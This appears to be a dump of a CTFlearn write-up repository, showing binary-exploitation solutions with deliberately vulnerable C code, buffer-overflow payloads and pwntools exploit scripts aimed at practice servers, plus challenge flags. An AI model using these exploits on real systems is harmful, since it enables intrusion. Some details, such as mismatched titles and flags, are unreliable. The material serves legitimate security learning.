├── Binary ├── Accumulator │ ├── Flag.png │ ├── README.md │ ├── task │ ├── task.c │ ├── task.tar │ └── task.tar.gz ├── Blackbox │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── Flag.png │ └── README.md ├── Favorite Color │ └── README.md ├── Jenny │ ├── Jenny.class │ └── README.md ├── Lazy Game Challenge │ ├── Flag.png │ └── README.md ├── Poor Login │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── login.tar.gz │ └── pwn-login │ │ ├── login │ │ └── login.c ├── README.md ├── RIP my bof │ ├── README.md │ ├── pwn-simple-rip │ │ ├── bof2.c │ │ └── server │ └── simple-rip.tar.gz └── Simple bof │ ├── 1.png │ ├── Flag.png │ ├── README.md │ ├── bof.c │ └── exploit.py ├── Cryptography ├── 3's or 16's? Don't Ask Me! │ ├── 1.png │ ├── 2.png │ ├── 3's or 16's.txt │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── Flag.png │ └── README.md ├── 5x5 Crypto │ ├── Flag.py │ ├── README.md │ └── Table.png ├── ALEXCTF CR2: Many time secrets │ ├── README.md │ ├── cribdrag.py │ └── msg (4) ├── Base 2 2 the 6 │ ├── Decode.png │ └── README.md ├── BruXOR │ ├── Flag.png │ ├── Input.png │ └── README.md ├── Character Encoding │ └── README.md ├── CoppeRSA Lattice │ ├── README.md │ └── exploit.py ├── Defying Hell │ ├── Flag.png │ ├── README.md │ ├── data.txt │ └── exploit.py ├── Encryption Master │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── Flag.png │ ├── Here ya go!.txt │ └── README.md ├── Hextroadinary │ ├── README.md │ └── xor.png ├── HyperStream Test #2 │ ├── Flag.png │ └── README.md ├── Image Editing │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── final.png │ ├── half.png │ └── stegsolve.png ├── Linear-feedback. Shift. Register │ ├── Flag.png │ ├── PRNG.zip │ ├── README.md │ ├── description.png │ ├── exploit.py │ └── secretMessage.hex ├── Modern Gaius Julius Caesar │ └── README.md ├── Morse Code │ ├── Flag.png │ └── README.md ├── Nasty Little Doctorses! │ ├── Flag.png │ └── README.md ├── RSA Beginner │ ├── Flag.py │ ├── README.md │ └── rsa (1).txt ├── RSA Noob │ ├── Factorize.png │ ├── Flag.py │ ├── README.md │ └── rsanoob (1).txt ├── Reverse Polarity │ ├── Covert.png │ └── README.md ├── Skynet Is (Almost) Taking Over │ ├── README.md │ └── Skynet.txt ├── So many 64s │ ├── README.md │ ├── exploit.py │ └── flag.txt ├── Substitution Cipher │ ├── Flag.png │ ├── Input.png │ ├── README.md │ └── Substitution.txt ├── Suspecious message │ ├── Flag.png │ ├── README.md │ └── photo.png ├── Symbolic Decimals │ ├── Flag.png │ └── README.md ├── The Simpsons │ ├── Flag.png │ ├── ItsKrumpingTime.jpg │ ├── README.md │ ├── encoding.py │ └── key.py ├── Tone dialing │ ├── Flag.png │ ├── README.md │ └── you_know_what_to_do.wav ├── Vigenere Cipher │ ├── Flag.png │ └── README.md ├── We want Nudes instead of Nukes │ ├── README.md │ └── exploit.py ├── Zippy.zip │ ├── Flag.png │ ├── README.md │ ├── crack.py │ ├── exploit.png │ ├── exploit.py │ ├── exploit.sh │ ├── flag_parts.zip │ └── flag_parts │ │ ├── flag00.zip │ │ ├── flag01.zip │ │ ├── flag02.zip │ │ ├── flag03.zip │ │ ├── flag04.zip │ │ ├── flag05.zip │ │ ├── flag06.zip │ │ ├── flag07.zip │ │ ├── flag08.zip │ │ ├── flag09.zip │ │ ├── flag10.zip │ │ ├── flag11.zip │ │ ├── flag12.zip │ │ └── flag13.zip └── otpyrC │ ├── 1.png │ ├── Flag.png │ ├── README.md │ └── Reverse.png ├── Forensics ├── 07601 │ ├── AGT.png │ └── README.md ├── A CAPture of a Flag │ ├── Base64.png │ ├── HTTP.png │ ├── README.md │ └── flag (4) ├── Binwalk │ ├── PurpleThing.jpeg │ └── README.md ├── Blank Page │ ├── 1.png │ ├── Flag.png │ ├── README.md │ ├── TheMessage.txt │ └── exploit.py ├── Bobby Toe's iPad │ ├── README.md │ ├── bobbytoesipad.png │ ├── hex.png │ ├── otp.png │ ├── split.png │ └── stego.png ├── Brute Force is Fun! │ ├── README.md │ ├── legotroopers.jpg │ └── output │ │ ├── audit.txt │ │ ├── jpg │ │ └── 00000000.jpg │ │ └── zip │ │ ├── 00000012.zip │ │ ├── exploit.py │ │ ├── flag.txt │ │ ├── flag.zip │ │ └── folders │ │ └── 73 │ │ ├── 43 │ │ └── p │ │ └── 47 │ │ └── p ├── Chalkboard │ ├── README.md │ └── math.jpg ├── Corrupted File │ ├── Edit.png │ ├── Flag.png │ ├── README.md │ ├── unopenable.gif │ └── unopenable1.gif ├── Digital Camouflage │ ├── Base64.png │ ├── README.md │ ├── TCP_Stream.png │ ├── TCP_Stream_Eq_0.png │ ├── TCP_Stream_Eq_3.png │ └── data.pcap ├── Dumpster │ ├── Decryptor.java │ ├── README.md │ ├── dumpster.zip │ └── heapdump.hprof ├── Exclusive Santa │ ├── Exclusive_Santa.rar │ ├── Flag.png │ └── README.md ├── Exif │ ├── Computer-Password-Security-Hacker - Copy.jpg │ └── README.md ├── Forensics 101 │ ├── 95f6edfb66ef42d774a5a34581f19052.jpg │ └── README.md ├── GandalfTheWise │ ├── Flag.png │ ├── Gandalf.jpg │ ├── README.md │ ├── String1.png │ ├── String2.png │ └── String3.png ├── Git Is Good │ ├── README.md │ ├── gitIsGood.zip │ └── gitIsGood │ │ └── flag.txt ├── HailCaesar! │ ├── Base64.png │ ├── Flag.png │ ├── HailCaesar.jpg │ └── README.md ├── I'm a dump │ ├── README.md │ └── file ├── Jakarta │ ├── Flag.png │ ├── Jakarta.jpg │ ├── README.md │ ├── jakarta.py │ ├── jakarta_data.png │ ├── jakarta_data.py │ ├── jakarta_flag │ └── jakarta_rsa.key ├── Milk's Best Friend │ ├── README.md │ ├── _oreo.jpg.extracted │ │ ├── 1 │ │ │ ├── a │ │ │ └── b.jpg │ │ └── 252B.rar │ ├── b.jpg │ └── oreo.jpg ├── Minions │ ├── Hey_You.png │ ├── Only_Few_Steps.jpg │ ├── README.md │ ├── YouWon(Almost).png │ ├── _Hey_You.png.extracted │ │ ├── 0 │ │ ├── 5B │ │ ├── 5B-0 │ │ ├── D3EDB │ │ └── You_Still_Here │ │ │ └── Nothing_Here_16 │ │ │ └── ..txt │ └── _Only_Few_Steps.jpg.extracted │ │ ├── 0 │ │ ├── 22806 │ │ ├── 1AA │ │ └── 1E ├── MountainMan │ ├── Flag.png │ ├── Hexdump.png │ ├── MountainMan.jpg │ └── README.md ├── Mr.Bin │ ├── 600x600_picture │ ├── D0F0.zip │ ├── D0F0 │ │ └── bin │ ├── README.md │ ├── bin │ ├── binwalk.png │ ├── exploit.py │ ├── image.jpg │ ├── password.png │ └── strings.out ├── Music To My Ears │ ├── README.md │ └── hereisyourflag.m4a ├── Naughty Cat │ ├── README.md │ └── cut3_c4t.png ├── PDF by fdpumyp │ ├── README.md │ └── dontopen.pdf ├── Pho Is Tasty! │ ├── Flag.png │ ├── Pho.jpg │ └── README.md ├── PikesPeak │ ├── PikesPeak.jpg │ └── README.md ├── QR-code inception │ ├── README.md │ ├── flag.png │ ├── flag_qr.png │ ├── inception.png │ └── qr.py ├── Rubber Duck │ ├── README.md │ └── RubberDuck.jpg ├── Seeing is believing │ ├── Flag.png │ ├── README.md │ ├── Spectogram.png │ ├── message.zip │ └── seeingisbelieving │ │ ├── help (copy).ogg │ │ └── help.me ├── ShahOfGimli │ ├── 0 │ ├── Gimli04Base.jpg │ ├── README.md │ ├── ShahOfGimli.jpg │ ├── _ShahOfGimli.jpg.extracted │ │ ├── 0 │ │ ├── 20517.tar │ │ ├── Gimli04Base.jpg │ │ ├── flag.enc │ │ └── flag.txt │ └── flag.txt ├── Simple Steganography │ ├── Minions1.jpeg │ ├── README.md │ └── raw.txt ├── Smiling ASCII │ ├── ALTERNATIVE.md │ ├── README.md │ ├── data_extract.png │ ├── interference.png │ └── smiling.png ├── Snowboard │ ├── README.md │ ├── Snowboard.jpg │ └── _Snowboard.jpg.extracted │ │ ├── 0 │ │ ├── 393B │ │ ├── 395D │ │ ├── 3A4 │ │ └── 5A ├── Taking LS │ ├── README.md │ ├── The Flag.zip │ └── The Flag │ │ └── The Flag.pdf ├── The Data Scientist │ ├── README.md │ └── the_data_scientist.csv ├── The Keymaker │ ├── README.md │ ├── The-Keymaker.jpg │ ├── flag │ └── flag.enc ├── The adventures of Boris Ivanov. Part 1. │ ├── Boris_Ivanov_1.jpg │ ├── Flag.png │ └── README.md ├── Tux! │ ├── Base64.png │ ├── README.md │ ├── Tux.jpg │ └── _Tux.jpg.extracted │ │ ├── 1570.zip │ │ └── flag ├── Up For A Little Challenge? │ ├── Begin Hack.jpg │ ├── Did I Forget Again? │ │ ├── Loo Nothing Becomes Useless ack.jpg │ │ └── skycoder.jpg │ ├── README.md │ └── Up For A Little Challenge.zip ├── WOW.... So Meta │ ├── 3UWLBAUCb9Z2.jpg │ └── README.md ├── abandoned place │ ├── Hex1.png │ ├── Hex2.png │ ├── README.md │ ├── abondoned_street_challenge2.jpg │ └── abondoned_street_challenge2_altered.jpg └── office flag │ ├── README.md │ ├── flag.odt │ └── flag.zip ├── LICENSE ├── Miscellaneous ├── Ambush Mission │ ├── Base64.png │ ├── Flag.png │ ├── README.md │ ├── Reversal.png │ └── clue.png ├── Android, run! │ ├── Flag.png │ ├── README.md │ └── Run.apk ├── F1L3 M1X3R │ ├── Flag.jpeg │ ├── README.md │ ├── Repair.png │ ├── Unrepair.png │ ├── exploit.py │ └── fl4g.jpeg ├── Get Into Command Mission │ ├── Dump.txt │ ├── Flag.png │ ├── README.md │ └── program.exe ├── Help Bity │ └── README.md ├── Practice Flag │ └── README.md ├── QR Code v2 │ ├── Flag.txt │ ├── README.md │ ├── Scan.png │ └── qr_code.jpg ├── QR Code │ ├── Base64.png │ ├── README.md │ ├── ROT13.png │ ├── Scan.png │ └── qrcode.39907201.png ├── Reversal of fortune │ └── README.md ├── Rock Paper Scissors │ ├── Flag.png │ └── README.md ├── Time Traveller │ ├── Flag.png │ ├── README.md │ ├── Web1.png │ └── Web2.png ├── What could this be? │ ├── Input.png │ ├── Output.png │ ├── README.md │ └── what_can_this_be.txt ├── Where Can My Robot Go? │ └── README.md └── Wikipedia │ ├── 1.png │ ├── 2.png │ ├── 3.png │ └── README.md ├── Programming ├── An Old Image │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── new_image.png │ └── old_image.png ├── AndhraPradesh Assembler Chall │ ├── AndhraPradesh │ ├── AndhraPradesh.asm │ ├── AndhraPradesh.o │ ├── AndhraPradesh.zip │ ├── README.md │ ├── clnasm.sh │ └── readme ├── Dawn's Lawn │ ├── Flag.py │ ├── README.md │ ├── dawn.txt │ └── dawn2.txt ├── Fabio's Nachos │ ├── Base64.png │ ├── Flag.png │ ├── README.md │ ├── base.txt │ └── exploit.py ├── Image Magic │ ├── ALTERNATE.md │ ├── Exploit.py │ ├── Flag.jpg │ ├── README.md │ ├── flag.png │ ├── out copy.jpg │ └── script.py ├── Is it the Flag? (JAVA) │ ├── Flag.py │ ├── IsItTheFlag.java │ └── README.md ├── Old memories │ ├── 1.png │ ├── 2.png │ ├── README.md │ ├── exploit.py │ ├── flag.png │ └── hisss.zip ├── Programming a language │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ └── input.txt ├── Python Reversal │ ├── README.md │ ├── exploit.py │ └── rev.py ├── Read in Color │ ├── README.md │ ├── color_img.png │ └── exploit.py ├── Simple Programming │ ├── Flag.py │ ├── README.md │ └── data.dat ├── The Adventures of Boris Ivanov Part 2 │ ├── Concatenate.py │ ├── README.md │ ├── concatenate.png │ └── confetti.zip └── Weird Android Calculator │ └── README.md ├── README.md ├── Reverse ├── Basic Android RE 1 │ ├── BasicAndroidRE1.apk │ ├── Flag.png │ └── README.md ├── Bite-code │ ├── Bruteforce.c │ ├── README.md │ └── bitecode.txt ├── Every Bit Counts │ ├── README.md │ └── every_bit_counts ├── Finish The Flag │ ├── Flag.png │ ├── README.md │ ├── exec.png │ ├── exec.py │ ├── exec_bin │ ├── exploit.py │ ├── finish_the_flag │ │ ├── qr.asm.enc │ │ ├── qr.png │ │ └── readme.txt │ ├── letter.zip │ ├── objdump.png │ └── qr.png ├── Jumper │ ├── README.md │ ├── flag │ ├── flag.c │ └── jump.asm ├── Lost In The Binary │ ├── Crack.py │ ├── README.md │ └── lost_in_bin ├── PIN │ ├── README.md │ ├── rev1 │ └── rev1.i64 ├── PyDis │ ├── Flag.png │ ├── README.md │ ├── dis.txt │ └── exploit.py ├── RE_verseDIS │ ├── README.md │ └── problem ├── Ramada │ ├── Flag.png │ ├── README.md │ ├── Ramada │ ├── Ramada.zip │ ├── exploit.py │ ├── readme │ ├── reversing │ └── sources.zip.enc ├── Rangoon │ ├── README.md │ ├── Rangoon │ ├── Rangoon.md │ ├── Rangoon.zip │ ├── readme │ └── sources.zip.enc ├── Raspberry │ ├── Flag.png │ ├── README.md │ ├── Raspberry │ ├── Raspberry.zip │ ├── exploit.py │ ├── readme │ └── sources.zip.enc ├── Recklinghausen │ ├── Flag.png │ ├── README.md │ ├── Recklinghausen │ ├── Recklinghausen.zip │ ├── exploit.py │ ├── readme │ └── sources.zip.enc ├── Reverse Me │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ └── reverseme ├── Reykjavik │ ├── README.md │ ├── Reykjavik │ ├── Reykjavik.zip │ └── readme ├── Rotterdam Reversing Challenge │ ├── Flag.png │ ├── README.md │ ├── Rotterdam │ ├── Rotterdam_1.zip │ ├── exploit.py │ ├── readme │ ├── rotterdam.asm │ └── sources.zip.enc ├── Rzeszow │ ├── Flag.png │ ├── README.md │ ├── Rzeszow │ ├── Rzeszow.zip │ ├── exploit.py │ ├── readme │ ├── reversing │ └── sources.zip.enc ├── The Super Secure Service │ ├── README.md │ ├── Web1.png │ ├── code.dat │ └── exploit.py └── Time to Eat │ ├── README.md │ └── eat.py ├── Web ├── AudioEdit │ ├── Flag1.png │ ├── Flag2.png │ ├── README.md │ └── Web1.png ├── Basic Injection │ └── README.md ├── Calculat3 M3 │ ├── Flag.png │ ├── Inspect.png │ └── README.md ├── Don't Bump Your Head(er) │ ├── README.md │ └── Web1.png ├── Gobustme 👻 │ ├── README.md │ ├── common.txt │ ├── results.png │ └── setup.png ├── Grid It! │ └── README.md ├── Inj3ction Time │ ├── Flag.png │ └── README.md ├── My Blog │ ├── Flag.png │ ├── README.md │ ├── Web1.png │ └── Web2.png ├── POST Practice │ ├── README.md │ └── Web_Page.png └── Prehashbrown │ ├── README.md │ ├── Register.png │ └── Search.png └── _config.yml /Binary/Accumulator/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/Flag.png -------------------------------------------------------------------------------- /Binary/Accumulator/README.md: -------------------------------------------------------------------------------- 1 | ## AndhraPradesh Assembler Chall 2 | The main idea finding the flag using buffer overflow technique. 3 | 4 | #### Step-1: 5 | We are given `task.c` which has C code which essentially is used to fetch the flag. 6 | 7 | ```c 8 | ... 9 | int acc = 0; 10 | int n; 11 | while (acc >= 0){ 12 | printf("acc = %d\n", acc); 13 | printf("Enter a number: "); 14 | 15 | if (scanf("%d", &n) != 1){ 16 | puts("Error reading integer"); 17 | } else { 18 | if (n < 0){ 19 | puts("You can't enter the negative number!"); 20 | } else { 21 | acc += n; 22 | } 23 | } 24 | } 25 | 26 | printf("You win! acc = %d\n", acc); 27 | ... 28 | ``` 29 | 30 | #### Step-2: 31 | By manipulating the value of `n`, the value of `acc` varies and that is what we have to exploit. After finding an optimum `n` after some trial and error, we find that for the value `n = 99999999999999999`, the `acc` variable overflows. 32 | 33 | #### Step-3: 34 | The final execution can be shown as below. 35 | 36 | 37 | 38 | #### Step-4: 39 | Finally the flag becomes: 40 | `CTFlearn{n3x7_7yp3_0f_0v3rf0w}` -------------------------------------------------------------------------------- /Binary/Accumulator/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/task -------------------------------------------------------------------------------- /Binary/Accumulator/task.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | setvbuf(stdout, NULL, _IONBF, 0); 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | 8 | int acc = 0; 9 | int n; 10 | while (acc >= 0){ 11 | printf("acc = %d\n", acc); 12 | printf("Enter a number: "); 13 | 14 | if (scanf("%d", &n) != 1){ 15 | puts("Error reading integer"); 16 | } else { 17 | if (n < 0){ 18 | puts("You can't enter the negative number!"); 19 | } else { 20 | acc += n; 21 | } 22 | } 23 | } 24 | 25 | printf("You win! acc = %d\n", acc); 26 | system("cat ./flag.txt"); 27 | } 28 | -------------------------------------------------------------------------------- /Binary/Accumulator/task.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/task.tar.gz -------------------------------------------------------------------------------- /Binary/Blackbox/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/1.png -------------------------------------------------------------------------------- /Binary/Blackbox/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/2.png -------------------------------------------------------------------------------- /Binary/Blackbox/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/3.png -------------------------------------------------------------------------------- /Binary/Blackbox/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/Flag.png -------------------------------------------------------------------------------- /Binary/Blackbox/README.md: -------------------------------------------------------------------------------- 1 | ## Blackbox 2 | The main idea of finding the flag is String Overflow. 3 | 4 | #### Step-1: 5 | After I SSH'ed into `ssh blackbox@104.131.79.111 -p 1001` with password as `guest` (given), I got this: 6 | 7 | 8 | 9 | #### Step-2: 10 | So, I tried to run `blackbox` file. 11 | 12 | 13 | 14 | #### Step-3: 15 | Now it was time to go wild. So, I gave very big inputs to see the threshold of String Overflow. 16 | 17 | 18 | 19 | #### Step-4: 20 | So, lets just print to exceed 80 characters because at 81st character we find the string overflow here. 21 | Executing this one liner, gives us flag. 22 | 23 | ```py 24 | python -c "print '11111111111111111111111111111111111111111111111111111111111111111111111111111111\x02\x00\x00\x00'" | ./blackbox 25 | ``` 26 | Output: 27 | 28 | ```bash 29 | What is 1 + 1 = CORRECT! You get flag: 30 | flag{0n3_4lus_1_1s_Tw0_dumm13!!} 31 | 32 | [2]+ Stopped python -c "print '11111111111111111111111111111111111111111111111111111111111111111111111111111111\x02\x00\x00\x00'" | ./blackbox 33 | ``` 34 | 35 | 36 | 37 | #### Step-5: 38 | Finally, the flag becomes: 39 | `the_flag_is{A_sP3c7r0grAm?!}` 40 | -------------------------------------------------------------------------------- /Binary/Favorite Color/README.md: -------------------------------------------------------------------------------- 1 | ## Favorite Color 2 | The main idea finding the flag is exploiting the Buffer Overflow of the Binary file. 3 | 4 | #### Step-1: 5 | After logging into the remote access with `ssh color@104.131.79.111 -p 1001` and password as `guest`, 6 | my system got completely crashed due to several DDoS attacks. So, I directly looked up for solution and understood from there. 7 | 8 | https://www.embeddedhacker.com/2020/01/hacking-walkthrough-ctflearn-binary-medium/ 9 | 10 | 11 | 12 | #### Step-2: 13 | 14 | Finally the flag becomes: 15 | `flag{c0lor_0f_0verf1ow}` -------------------------------------------------------------------------------- /Binary/Jenny/Jenny.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Jenny/Jenny.class -------------------------------------------------------------------------------- /Binary/Jenny/README.md: -------------------------------------------------------------------------------- 1 | ## Jenny 2 | The main idea to find the flag is java decompiling with above and over Ubuntu 18.04 LTS OS. 3 | 4 | #### Step-1: 5 | 6 | https://www.youtube.com/watch?v=no00Ec3YxXc 7 | 8 | #### Step-2: 9 | Finally, the flag becomes: 10 | `N0w_1_kn0w_wh0_jen1_1s!11JNI_IS_SO_COOL!` -------------------------------------------------------------------------------- /Binary/Lazy Game Challenge/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Lazy Game Challenge/Flag.png -------------------------------------------------------------------------------- /Binary/Lazy Game Challenge/README.md: -------------------------------------------------------------------------------- 1 | ## Lazy Game Challenge 2 | The main idea finding the flag is thinking differently to break the logic in binary file. 3 | 4 | #### Step-1: 5 | After pwning into the given machine: `nc thekidofarcrania.com 10001`, we are asked to play a betting game. 6 | 7 | #### Step-2: 8 | I input Y and proceed to see the game. According to given scenario, I seemed to lose every bet of 100$. So I had to do something differently. 9 | 10 | #### Step-3: 11 | This time I placed a bet of a hefty number like `$1000000` which I didn't even possess. I spit out errors. :worried: 12 | 13 | #### Step-4: 14 | But the main idea in pwning lies in abnormal thinking and that's where you focus. I tried out negative number this time for the bet like -100000$. I still could play, it shows there was a program logic flaw there. 15 | 16 | Now I went wild to give all numbers (which I had to guess below 10) greater than 10. Finally it gave me flag. 17 | 18 | 19 | 20 | #### Step-5: 21 | Finally the flag becomes: 22 | `CTFlearn{d9029a08c55b936cbc9a30_i_wish_real_betting_games_were_like_this!}` 23 | -------------------------------------------------------------------------------- /Binary/Poor Login/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/Flag.png -------------------------------------------------------------------------------- /Binary/Poor Login/exploit.py: -------------------------------------------------------------------------------- 1 | import pwn 2 | 3 | host = "thekidofarcrania.com" 4 | port = 13226 5 | target = "./pwn-login/login" 6 | 7 | class Menu: 8 | 9 | def __init__(self, remote): 10 | if remote: 11 | self.pr = pwn.connect(host, port) 12 | else: 13 | self.pr = pwn.process(target) 14 | 15 | def login(self, name): 16 | self.pr.sendlineafter("> ", "1") 17 | self.pr.sendlineafter("Username: ", name) 18 | 19 | def sign_out(self): 20 | self.pr.sendlineafter("> ", "2") 21 | 22 | def print_flag(self, flag): 23 | self.pr.sendlineafter("> ", "3") 24 | line = self.pr.readline() 25 | if line.startswith(b"You are not admin."): 26 | self.pr.sendline(flag) 27 | else: 28 | print(line) 29 | print(self.pr.readline()) 30 | 31 | def lock_user(self): 32 | self.pr.sendlineafter("> ", "4") 33 | 34 | def restore_user(self): 35 | self.pr.sendlineafter("> ", "5") 36 | 37 | 38 | def exploit(remote): 39 | 40 | menu = Menu(remote) 41 | 42 | try: 43 | menu.login('A'*31) 44 | menu.lock_user() 45 | menu.sign_out() 46 | menu.print_flag(b'\x01'*40) 47 | menu.restore_user() 48 | menu.print_flag("") 49 | except Exception as ex: 50 | print(ex) 51 | finally: 52 | menu.pr.close() 53 | 54 | exploit(True) 55 | -------------------------------------------------------------------------------- /Binary/Poor Login/login.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/login.tar.gz -------------------------------------------------------------------------------- /Binary/Poor Login/pwn-login/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/pwn-login/login -------------------------------------------------------------------------------- /Binary/README.md: -------------------------------------------------------------------------------- 1 | ## Binary Challenges 2 | 3 |

4 | Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions. 5 |

6 | 7 | ## Solved Challenges List 8 | 9 | 1. [Blackbox](./Blackbox/README.md) 10 | 2. [Favorite Color](./Favorite%20Color/README.md) 11 | 3. [Jenny](./Jenny/README.md) 12 | 4. [Lazy Game Challenge](./Lazy%20Game%20Challenge/README.md) 13 | 5. [RIP my bof](./RIP%20my%20bof/README.md) 14 | 6. [Simple bof](./Simple%20bof/README.md) 15 | -------------------------------------------------------------------------------- /Binary/RIP my bof/README.md: -------------------------------------------------------------------------------- 1 | ## RIP my bof 2 | The main idea of finding the flag is Buffer Overflow. 3 | 4 | #### Step-1: 5 | I checked out this writeup to get the flag and understand the method of solving. 6 | 7 | https://n00bmaster.me/posts/CTFLearn_Easy_Pwn/ 8 | 9 | #### Step-2: 10 | Finally, the flag becomes: 11 | `CTFlearn{c0ntr0ling_r1p_1s_n0t_t00_h4rd_abjkdlfa}` -------------------------------------------------------------------------------- /Binary/RIP my bof/pwn-simple-rip/bof2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Defined in a separate source file for simplicity. 7 | void init_visualize(char* buff); 8 | void visualize(char* buff); 9 | 10 | void win() { 11 | system("/bin/cat /flag.txt"); 12 | } 13 | 14 | void vuln() { 15 | char padding[16]; 16 | char buff[32]; 17 | 18 | memset(buff, 0, sizeof(buff)); // Zero-out the buffer. 19 | memset(padding, 0xFF, sizeof(padding)); // Mark the padding with 0xff. 20 | 21 | // Initializes the stack visualization. Don't worry about it! 22 | init_visualize(buff); 23 | 24 | // Prints out the stack before modification 25 | visualize(buff); 26 | 27 | printf("Input some text: "); 28 | gets(buff); // This is a vulnerable call! 29 | 30 | // Prints out the stack after modification 31 | visualize(buff); 32 | } 33 | 34 | int main() { 35 | setbuf(stdout, NULL); 36 | setbuf(stdin, NULL); 37 | vuln(); 38 | } 39 | -------------------------------------------------------------------------------- /Binary/RIP my bof/pwn-simple-rip/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/RIP my bof/pwn-simple-rip/server -------------------------------------------------------------------------------- /Binary/RIP my bof/simple-rip.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/RIP my bof/simple-rip.tar.gz -------------------------------------------------------------------------------- /Binary/Simple bof/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Simple bof/1.png -------------------------------------------------------------------------------- /Binary/Simple bof/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Simple bof/Flag.png -------------------------------------------------------------------------------- /Binary/Simple bof/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Secret is the string which we want to overflow with value which we want to overwrite 3 | # p32 function packs the value in a little endian format 4 | secret = p32(0x67616c66) 5 | padding = b"\x41" * 48 6 | 7 | p = remote("thekidofarcrania.com", 35235) 8 | p.recv() 9 | p.sendline(padding + secret) 10 | p.interactive() -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/1.png -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/2.png -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/3.png -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/4.png -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/5.png -------------------------------------------------------------------------------- /Cryptography/3's or 16's? Don't Ask Me!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/Flag.png -------------------------------------------------------------------------------- /Cryptography/5x5 Crypto/Flag.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | arr = np.arange(65,90).reshape(5, 5) # 